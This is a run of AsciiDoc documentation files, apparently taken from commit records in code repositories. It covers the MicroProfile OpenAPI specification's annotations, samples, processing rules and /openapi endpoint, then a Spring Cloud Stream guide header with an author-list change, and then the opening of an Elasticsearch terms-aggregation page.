Mechanisms\n\nThere are many different ways to provide input for the generation of the resulting\nOpenAPI document.\n\nThe MP OpenAPI specification requires vendors to produce a valid OpenAPI document\nfrom pure JAX-RS 2.0 applications. This means that vendors must process all the\nrelevant JAX-RS annotations (such as `@Path` and `@Consumes`) as well as Java objects\n(POJOs) used as input or output to JAX-RS operations. This is a good place to\nstart for application developers that are new to OpenAPI: just deploy your existing\nJAX-RS application into a MP OpenAPI vendor and check out the output from `\/openapi`!\n\nThe application developer then has a few choices:\n\n1. Augment those JAX-RS annotations with the\nOpenAPI <<Annotations>>. Using annotations means\ndevelopers don't have to re-write the portions of the OpenAPI document that are\nalready covered by the JAX-RS framework (e.g. the HTTP method of an operation).\n\n2. Take the initial output from `\/openapi` as a starting point to document\nyour APIs via <<Static OpenAPI files>>. It's worth mentioning that these static\nfiles can also be written before any code, which is an approach often adopted by\nenterprises that want to lock-in the contract of the API. In this case, we refer\nto the OpenAPI document as the \"source of truth\", by which the client and provider\nmust abide.\n\n3. Use the <<Programming model>> to provide a bootstrap (or complete)\nOpenAPI model tree.\n\nAdditionally, a <<Filter>> is described which can update the OpenAPI model after it has\nbeen built from the previously described documentation mechanisms.\n\n=== Annotations\n\nMany of these OpenAPI v3 annotations were derived from the https:\/\/github.com\/swagger-api\/swagger-core[Swagger Core] library, which\nallows for a mostly-mechanical transformation of applications that are using that\nlibrary and wish to take advantage to the official MP OpenAPI interfaces.\n\n==== Quick overview of annotations\n\nThe following annotations are found in the https:\/\/github.com\/eclipse\/microprofile-open-api\/tree\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations[org.eclipse.microprofile.openapi.annotations] package.\n\n[cols=\"1,4\"]\n|===\n| Annotation | Description\n\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/callbacks\/Callback.java[@Callback] | Represents a callback URL that will be invoked.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/callbacks\/Callbacks.java[@Callbacks] | Represents an array of Callback URLs that can be invoked.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/callbacks\/CallbackOperation.java[@CallbackOperation] | Represents an operation that will be invoked during the callback.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/Components.java[@Components] | A container that holds various reusable objects for different aspects of the OpenAPI Specification.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/Explode.java[@Explode] | Enumeration used to define the value of the `explode` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/ParameterIn.java[@ParameterIn] | Enumeration representing the parameter's `in` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/ParameterStyle.java[@ParameterStyle] | Enumeration for the parameter's `style` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/SecuritySchemeIn.java[@SecuritySchemeIn] | Enumeration for the security scheme's `in` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/enums\/SecuritySchemeType.java[@SecuritySchemeType] | Enumeration for the security scheme's `type` property.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/extensions\/Extension.java[@Extension] | Adds an extension with contained properties.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/extension\/Extensions.java[@Extensions] | Adds custom properties to an extension.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/ExternalDocumentation.java[@ExternalDocumentation] | References an external resource for extended documentation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/headers\/Header.java[@Header] | Describes a single header object.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/info\/Contact.java[@Contact] | Contact information for the exposed API.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/info\/Info.java[@Info] | This annotation encapsulates metadata about the API.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/info\/License.java[@License] | License information for the exposed API.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/links\/Link.java[@Link] | Represents a design-time link for a response.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/links\/LinkParameter.java[@LinkParameter] | Represents a parameter to pass to the linked operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/Content.java[@Content] | Provides schema and examples for a particular media type.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/DiscriminatorMapping.java[@DiscriminatorMapping] | Used to differentiate between other schemas which may satisfy the payload description.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/Encoding.java[@Encoding] | Single encoding definition to be applied to single Schema Object.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/ExampleObject.java[@ExampleObject] | Illustrates an example of a particular content.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/media\/Schema.java[@Schema] | Allows the definition of input and output data types.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/OpenAPIDefinition.java[@OpenAPIDefinition] | General metadata for an OpenAPI definition.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/Operation.java[@Operation] | Describes an operation or typically a HTTP method against a specific path.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/parameters\/Parameter.java[@Parameter] | Describes a single operation parameter.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/parameters\/Parameters.java[@Parameters] | Encapsulates input parameters.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/parameters\/RequestBody.java[@RequestBody] | Describes a single request body.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/response\/APIResponse.java[@APIResponse] | Describes a single response from an API operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/response\/APIResponses.java[@APIResponses] | A container for multiple responses from an API operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/OAuthFlow.java[@OAuthFlow] | Configuration details for a supported OAuth Flow.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/OAuthFlows.java[@OAuthFlows] | Allows configuration of the supported OAuth Flows.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/OAuthScope.java[@OAuthScope] | Represents an OAuth scope.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityRequirement.java[@SecurityRequirement] | Specifies a security requirement for an operation.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityRequirements.java[@SecurityRequirements] | Represents an array of security requirements where only one needs to be satisfied.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityRequirementsSet.java[@SecurityRequirementsSet] | Represents an array of security requirements that need to be satisfied.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecurityScheme.java[@SecurityScheme] | Defines a security scheme that can be used by the operations.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/security\/SecuritySchemes.java[@SecuritySchemes] | Represents an array of security schemes that can be specified.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/servers\/Server.java[@Server]| Represents a server used in an operation or used by all operations in an OpenAPI document.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/servers\/Servers.java[@Servers] | A container for multiple server definitions.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/servers\/ServerVariable.java[@ServerVariable] | Represents a server variable for server URL template substitution.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/tags\/Tag.java[@Tag] | Represents a tag for the API endpoint.\n| https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/annotations\/tags\/Tags.java[@Tags] | A container of multiple tags.\n|===\n\n==== Detailed usage of key annotations\n\n===== Operation\n\n.Sample 1 - Simple operation description\n[source,Java]\n----\n@GET\n@Path(\"\/findByStatus\")\n@Operation(summary = \"Finds Pets by status\",\n description = \"Multiple status values can be provided with comma separated strings\")\npublic Response findPetsByStatus(...) { ... }\n----\n\n.Output for Sample 1\n[source, yaml]\n----\n\/pet\/findByStatus:\n get:\n summary: Finds Pets by status\n description: Multiple status values can be provided with comma separated strings\n operationId: findPetsByStatus\n----\n\n.Sample 2 - Operation with different responses\n[source,Java]\n----\n@GET\n@Path(\"\/{username}\")\n@Operation(summary = \"Get user by user name\")\n@APIResponse(description = \"The user\",\n content = @Content(mediaType = \"application\/json\",\n schema = @Schema(implementation = User.class))),\n@APIResponse(responseCode = \"400\", description = \"User not found\")\npublic Response getUserByName(\n @Parameter(description = \"The name that needs to be fetched. Use user1 for testing. \", required = true) @PathParam(\"username\") String username)\n {...}\n----\n\n.Output for Sample 2\n[source, yaml]\n----\n\/user\/{username}:\n get:\n summary: Get user by user name\n operationId: getUserByName\n parameters:\n - name: username\n in: path\n description: 'The name that needs to be fetched. Use user1 for testing. '\n required: true\n schema:\n type: string\n responses:\n default:\n description: The user\n content:\n application\/json:\n schema:\n $ref: '#\/components\/schemas\/User'\n 400:\n description: User not found\n----\n\n\n===== RequestBody\n\n\n.Sample 1 - Simple RequestBody\n[source,Java]\n----\n@POST\n@Path(\"\/user\")\n@Operation(summary = \"Create user\",\n description = \"This can only be done by the logged in user.\")\npublic Response methodWithRequestBody(\n @RequestBody(description = \"Created user object\", required = true,\n content = @Content(schema = @Schema(implementation = User.class))) User user,\n @QueryParam(\"name\") String name, @QueryParam(\"code\") String code)\n { ... }\n----\n\n.Output for Sample 1\n[source, yaml]\n----\npost:\n summary: Create user\n description: This can only be done by the logged in user.\n operationId: methodWithRequestBody\n parameters:\n - name: name\n in: query\n schema:\n type: string\n - name: code\n in: query\n schema:\n type: string\n requestBody:\n description: Created user object\n content:\n '*\/*':\n schema:\n $ref: '#\/components\/schemas\/User'\n required: true\n responses:\n default:\n description: no description\n----\n\n===== Servers\n\n.Sample 1 - Extended Server scenarios\n[source,Java]\n----\n@OpenAPIDefinition(\n servers = {\n @Server(\n description = \"definition server 1\",\n url = \"http:\/\/{var1}.definition1\/{var2}\",\n variables = {\n @ServerVariable(name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"}),\n @ServerVariable(name = \"var2\",\n description = \"var 2\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})})\n@Server(\n description = \"class server 1\",\n url = \"http:\/\/{var1}.class1\/{var2}\",\n variables = {\n @ServerVariable(\n name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"}),\n @ServerVariable(\n name = \"var2\",\n description = \"var 2\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})\n@Server(\n description = \"class server 2\",\n url = \"http:\/\/{var1}.class2\",\n variables = {\n @ServerVariable(\n name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})\npublic class ServersResource {\n\n @GET\n @Path(\"\/\")\n @Server(\n description = \"method server 1\",\n url = \"http:\/\/{var1}.method1\",\n variables = {\n @ServerVariable(\n name = \"var1\",\n description = \"var 1\",\n defaultValue = \"1\",\n enumeration = {\"1\", \"2\"})})\n @Server(\n description = \"method server 2\",\n url = \"http:\/\/method2\"\n )\n public Response getServers() {\n return Response.ok().entity(\"ok\").build();\n }\n}\n----\n\n.Output for Sample 1\n[source, yaml]\n----\nopenapi: 3.0.0\nservers:\n- url: http:\/\/{var1}.definition1\/{var2}\n description: definition server 1\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n var2:\n description: var 2\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\npaths:\n \/:\n get:\n operationId: getServers\n responses:\n default:\n description: default response\n servers:\n - url: http:\/\/{var1}.class1\/{var2}\n description: class server 1\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n var2:\n description: var 2\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n - url: http:\/\/{var1}.class2\n description: class server 2\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n - url: http:\/\/{var1}.method1\n description: method server 1\n variables:\n var1:\n description: var 1\n enum:\n - \"1\"\n - \"2\"\n default: \"1\"\n - url: http:\/\/method2\n description: method server 2\n variables: {}\n----\n\n===== Schema\n\n.Sample 1 - Schema POJO\n[source,Java]\n----\n@Schema(name=\"MyBooking\", description=\"POJO that represents a booking.\")\npublic class Booking {\n @Schema(required = true, example = \"32126319\")\n private String airMiles;\n\n @Schema(required = true, example = \"window\")\n private String seatPreference;\n}\n----\n\n.Output for Sample 1\n[source, yaml]\n----\ncomponents:\n schemas:\n MyBooking:\n description: POJO that represents a booking.\n required:\n - airMiles\n - seatPreference\n type: object\n properties:\n airMiles:\n type: string\n example: \"32126319\"\n seatPreference:\n type: string\n example: window\n----\n\n\n.Sample 2 - Schema POJO reference\n[source,Java]\n----\n@POST\npublic Response createBooking(\n @RequestBody(description = \"Create a new booking.\",\n content = @Content(mediaType = \"application\/json\",\n schema = @Schema(implementation = Booking.class))) Booking booking) {\n----\n\n.Output for Sample 2\n[source, yaml]\n----\npost:\n operationId: createBooking\n requestBody:\n description: Create a new booking with the provided information.\n content:\n application\/json:\n schema:\n $ref: '#\/components\/schemas\/MyBooking'\n----\n\n\nFor more samples please see the https:\/\/github.com\/eclipse\/microprofile-open-api\/wiki[MicroProfile Wiki].\n\n=== Static OpenAPI files\n\nApplication developers may wish to include a pre-generated OpenAPI document that\nwas written separately from the code (e.g. with an editor such as https:\/\/editor.swagger.io\/[this]).\n\nDepending on the scenario, the document may be fully complete or partially complete.\nIf a document is fully complete then the application developer will want to set the\n`mp.openapi.scan.disable` configuration property to `true`. If a document is partially\ncomplete, then the application developer will need to augment the OpenAPI snippet\nwith annotations, programming model, or via the filter.\n\n==== Location and formats\n\nVendors are required to fetch a single document named `openapi` with an extension\nof `yml`, `yaml` or `json`, inside the application's `META-INF` folder. If there\nis more than one document found that matches one of these extensions the behavior\nof which file is chosen is undefined (i.e. each vendor may implement their own logic),\nwhich means that application developers should only place a single `openapi` document\ninto that folder.\n\n=== Programming model\n\nApplication developers are able to provide OpenAPI elements via Java POJOs. The\ncomplete set of models are found in the https:\/\/github.com\/eclipse\/microprofile-open-api\/tree\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/models[org.eclipse.microprofile.openapi.models] package.\n\n==== OASFactory\n\nThe https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASFactory.java[OASFactory] is used to create all of the elements of an OpenAPI tree.\n\nFor example, the following snippet creates a simple https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/models\/info\/Info.java[Info] element that contains a title, description, and version.\n\n[source,java]\n----\nOASFactory.createObject(Info.class).title(\"Airlines\").description(\"Airlines APIs\").version(\"1.0.0\");\n----\n\n==== OASModelReader\n\nThe https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASModelReader.java[OASModelReader] interface allows application developers to bootstrap the OpenAPI model tree\nused by the processing framework. To use it, simply create an implementation of\nthis interface and register it using the `mp.openapi.model.reader` configuration\nkey, where the value is the fully qualified name of the reader class.\n\n.Sample META-INF\/microprofile-config.properties\n[code,property]\n----\nmp.openapi.model.reader=com.mypackage.MyModelReader\n----\n\nSimilar to static files, the model reader can be used to provide either complete\nor partial model trees. If providing a complete OpenAPI model tree, application\ndevelopers should set the `mp.openapi.scan.disable` configuration to `true`.\nOherwise this partial model will be used as the base model during the processing\nof the other <<Documentation Mechanisms>>.\n\nVendors are required to call the OASReader a single time, in the order defined by\nthe <<Processing rules>> section. Only a single OASReader instance is allowed per\napplication.\n\n=== Filter\n\nThere are many scenarios where application developers may wish to update or remove\ncertain elements and fields of the OpenAPI document. This is done via a filter,\nwhich is called once after all other documentation mechanisms have completed.\n\n==== OASFilter\n\nThe https:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASFilter.java[OASFilter] interface allows application developers\nto receive callbacks for various key OpenAPI elements. The interface has a default\nimplementation for every method, which allows application developers to only override\nthe methods they care about. To use it, simply create an implementation of\nthis interface and register it using the `mp.openapi.filter` configuration\nkey, where the value is the fully qualified name of the filter class.\n\n.Sample META-INF\/microprofile-config.properties\n[code,property]\n----\nmp.openapi.filter=com.mypackage.MyFilter\n----\n\nVendors are required to call all registered filters in the application (0..N) once\nfor each filtered element. For example, the method `filterPathItem` is\ncalled *for each* corresponding `PathItem` element in the model tree. This allows\napplication developers to filter the element and any of its descendants.\n\nThe order of filter methods called is undefined, with two exceptions:\n\n1. All filterable descendant elements of a filtered element must be called before its ancestor.\n2. The `filterOpenAPI` method must be the *last* method called on a filter (which\nis just a specialization of the first exception).\n\n=== Processing rules\n\nThe processed document available from the <<OpenAPI Endpoint>> is built from a variety of sources,\nwhich were outlined in the sub-headings of <<Documentation Mechanisms>>. Vendors\nare required to process these different sources in the following order:\n\n1. Fetch configuration values from `mp.openapi` namespace\n2. Call OASModelReader\n3. Fetch static OpenAPI file\n4. Process annotations\n5. Filter model via OASFilter\n\n**Example processing**:\n\n* A vendor starts by fetching all available <<Configuration>>. If\nan `OASModelReader` was specified in that configuration list, its `buildModel`\nmethod is called to form the starting OpenAPI model tree for this application.\n* Any <<Vendor specific configuration>> are added on top of that starting model (overriding\nconflicts), or create a new model if an `OASModelReader` was not registered.\n* The vendor searches for a file as defined in the section <<Static OpenAPI files>>.\nIf found, it will read that document and merge with the model produced by previous\nprocessing steps (if any), where conflicting elements from the static file will override\nthe values from the original model.\n* If annotation scanning was not disabled, the JAX-RS and OpenAPI annotations from\nthe application will be processed, further overriding any conflicting elements\nfrom the current model.\n* The final model is filtered by walking the model tree and invoking all registered\n<<OASFilter>> classes.\n\n== OpenAPI Endpoint\n\n=== Overview\nA fully processed and valid OpenAPI document must be available at the root\nURL `\/openapi`, as a `HTTP GET` operation.\n\nFor example, `GET http:\/\/myHost:myPort\/openapi`.\n\nThis document represents the result of the applied <<Processing rules>>.\n\nThe protocol required is `http`. Vendors are encouraged, but not required, to\nsupport the `https` protocol as well, to enable a secure connection to the OpenAPI\nendpoint.\n\n=== Content format\nThe default format of the `\/openapi` endpoint is `YAML`.\n\nVendors must also support the `JSON` format if the request contains an `Accept`\nheader with a value of `application\/json`, in which case the response must contain\na `Content-Type` header with value of `application\/json`.\n\n=== Query parameters\nNo query parameters are required for the `\/openapi` endpoint. However, one\nsuggested but optional query parameter for vendors to support is `format`,\nwhere the value can be either `json` or `yaml`, to facilitate the toggle between\nthe default `yaml` format and `json` format.\n\n=== Context root behaviour\nVendors are required to ensure that the combination of each global https:\/\/github.com\/OAI\/OpenAPI-Specification\/blob\/master\/versions\/3.0.0.md#serverObject[server]\nelement and https:\/\/github.com\/OAI\/OpenAPI-Specification\/blob\/master\/versions\/3.0.0.md#pathItemObject[pathItem] element resolve to the absolute backend URL of that\nparticular path. If that `pathItem` contains a `servers` element , then this\nlist of operation-level `server` elements replaces the global list of servers\nfor that particular `pathItem`.\n\nFor example: an application may have an `ApplicationPath` annotation with the\nvalue of `\/`, but is assigned the context root of `\/myApp` during deployment. In\nthis case, the `server` elements (either global or operation-level) must either\nend with `\/myApp` or a corresponding proxy. Alternatively it is valid, but discouraged, to\nadd that context root (`\/myApp`) to every `pathItem` defined in that application.\n\n=== Multiple applications\n\nThe 1.0 version of the MicroProfile OpenAPI specification does not define how\nthe `\/openapi` endpoint may be partitioned in the event that the MicroProfile\nruntime supports deployment of multiple applications. If an implementation wishes\nto support multiple applications within a MicroProfile runtime, the semantics of\nthe `\/openapi` endpoint are expected to be the logical AND of all the applications\nin the runtime, which would imply merging multiple OpenAPI documents into a single\nvalid document (handling conflicting IDs and unique names).\n\n\n== Limitations\n\n=== Internationalization\nThe 1.0 version of the MicroProfile OpenAPI spec does not require vendors to\nsupport multiple languages based on the `Accept-Language`. One reasonable\napproach is for vendors to support unique keys (instead of hardcoded text) via\nthe various <<Documentation Mechanisms>>, so that the implementing framework can\nperform a global replacement of the keys with the language-specific text that\nmatches the `Accept-Language` request for the `\/openapi` endpoint. A cache of\nprocessed languages can be kept to improve performance.\n\n=== Validation\n\nThe MP OpenAPI 1.0 specification does not mandate vendors to validate the resulting\nOpenAPI v3 model (after processing the 5 steps previously mentioned), which means\nthat the behavior of invalid models is vendor specific (i.e. vendors may choose to\nignore, reject, or pass-through invalid inputs).\n\n=== Cross Origin Resource Sharing (CORS)\n\nThe MP OpenAPI 1.0 specification does not require vendors to support https:\/\/www.w3.org\/TR\/cors\/[CORS]\nfor the `\/openapi` endpoint. The behavior of CORS requests is implementation dependent.\n\ninclude::release_notes.asciidoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b09023b845de25ad72fa940685756b24a4f218c","subject":"Fix author list","message":"Fix author list\n","repos":"spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,garyrussell\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream","old_file":"spring-cloud-stream-docs\/src\/main\/asciidoc\/index.adoc","new_file":"spring-cloud-stream-docs\/src\/main\/asciidoc\/index.adoc","new_contents":"[[spring-cloud-stream-reference]]\n= Spring Cloud Stream Reference Guide\nSabby Anandan; Marius Bogoevici; Eric Bottard; Mark Fisher; Ilayaperumal Gopinathan; Gunnar Hillert; Mark Pollack; Patrick Peralta; Glenn Renfro; Thomas Risberg; Dave Syer; David Turanski; Janne Valkealahti; Benjamin Klein; Soby Chacko; Vinicius Carvalho\n:doctype: book\n:toc:\n:toclevels: 4\n:source-highlighter: prettify\n:numbered:\n:icons: font\n:hide-uri-scheme:\n:spring-cloud-stream-repo: snapshot\n:github-tag: master\n:spring-cloud-stream-docs-version: current\n:spring-cloud-stream-docs: http:\/\/docs.spring.io\/spring-cloud-stream\/docs\/{spring-cloud-stream-docs-version}\/reference\n:spring-cloud-stream-docs-current: http:\/\/docs.spring.io\/spring-cloud-stream\/docs\/current-SNAPSHOT\/reference\/html\/\n:github-repo: spring-cloud\/spring-cloud-stream\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:github-wiki: http:\/\/github.com\/{github-repo}\/wiki\n:github-master-code: http:\/\/github.com\/{github-repo}\/tree\/master\n:sc-ext: java\n\/\/ ======================================================================================\n\n= Spring Cloud Stream Core\n:stream-docs-basedir: ..\/..\/..\ninclude::spring-cloud-stream-aggregate.adoc[]\n\n= Appendices\n[appendix]\ninclude::building.adoc[]\ninclude::contributing.adoc[]\n\n\/\/ ======================================================================================\n","old_contents":"[[spring-cloud-stream-reference]]\n= Spring Cloud Stream Reference Guide\nSabby Anandan; Marius Bogoevici; Eric Bottard; Mark Fisher; Ilayaperumal Gopinathan; Gunnar Hillert; Mark Pollack; Patrick Peralta; Glenn Renfro; Thomas Risberg; Dave Syer; David Turanski; Janne Valkealahti; Benjamin Klein\n:doctype: book\n:toc:\n:toclevels: 4\n:source-highlighter: prettify\n:numbered:\n:icons: font\n:hide-uri-scheme:\n:spring-cloud-stream-repo: snapshot\n:github-tag: master\n:spring-cloud-stream-docs-version: current\n:spring-cloud-stream-docs: http:\/\/docs.spring.io\/spring-cloud-stream\/docs\/{spring-cloud-stream-docs-version}\/reference\n:spring-cloud-stream-docs-current: http:\/\/docs.spring.io\/spring-cloud-stream\/docs\/current-SNAPSHOT\/reference\/html\/\n:github-repo: spring-cloud\/spring-cloud-stream\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:github-wiki: http:\/\/github.com\/{github-repo}\/wiki\n:github-master-code: http:\/\/github.com\/{github-repo}\/tree\/master\n:sc-ext: java\n\/\/ ======================================================================================\n\n= Spring Cloud Stream Core\n:stream-docs-basedir: ..\/..\/..\ninclude::spring-cloud-stream-aggregate.adoc[]\n\n= Appendices\n[appendix]\ninclude::building.adoc[]\ninclude::contributing.adoc[]\n\n\/\/ ======================================================================================\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c17d14e382a6e38f094b9d099dc7123d11679dd0","subject":"[docs]\u00a0Fix typo: resonable - reasonable","message":"[docs]\u00a0Fix typo: resonable - reasonable","repos":"fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch","old_file":"docs\/reference\/search\/aggregations\/bucket\/terms-aggregation.asciidoc","new_file":"docs\/reference\/search\/aggregations\/bucket\/terms-aggregation.asciidoc","new_contents":"[[search-aggregations-bucket-terms-aggregation]]\n=== Terms Aggregation\n\nA multi-bucket value source based aggregation where buckets are dynamically built - one per unique value.\n\nExample:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : { \"field\" : \"gender\" }\n }\n }\n}\n--------------------------------------------------\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\" : {\n \"genders\" : {\n \"buckets\" : [\n {\n \"key\" : \"male\",\n \"doc_count\" : 10\n },\n {\n \"key\" : \"female\",\n \"doc_count\" : 10\n },\n ]\n }\n }\n}\n--------------------------------------------------\n\nBy default, the `terms` aggregation will return the buckets for the top ten terms ordered by the `doc_count`. One can\nchange this default behaviour by setting the `size` parameter.\n\n==== Size\n\nThe `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By\ndefault, the node coordinating the search process will request each shard to provide its own top `size` term buckets\nand once all shards respond, it will reduce the results to the final list that will then be returned to the client.\nThis means that if the number of unique terms is greater than `size`, the returned list is slightly off and not accurate\n(it could be that the term counts are slightly off and it could even be that a term that should have been in the top\nsize buckets was not returned). If set to `0`, the `size` will be set to `Integer.MAX_VALUE`.\n\n==== Document counts are approximate\n\nAs described above, the document counts (and the results of any sub aggregations) in the terms aggregation are not always\naccurate. This is because each shard provides its own 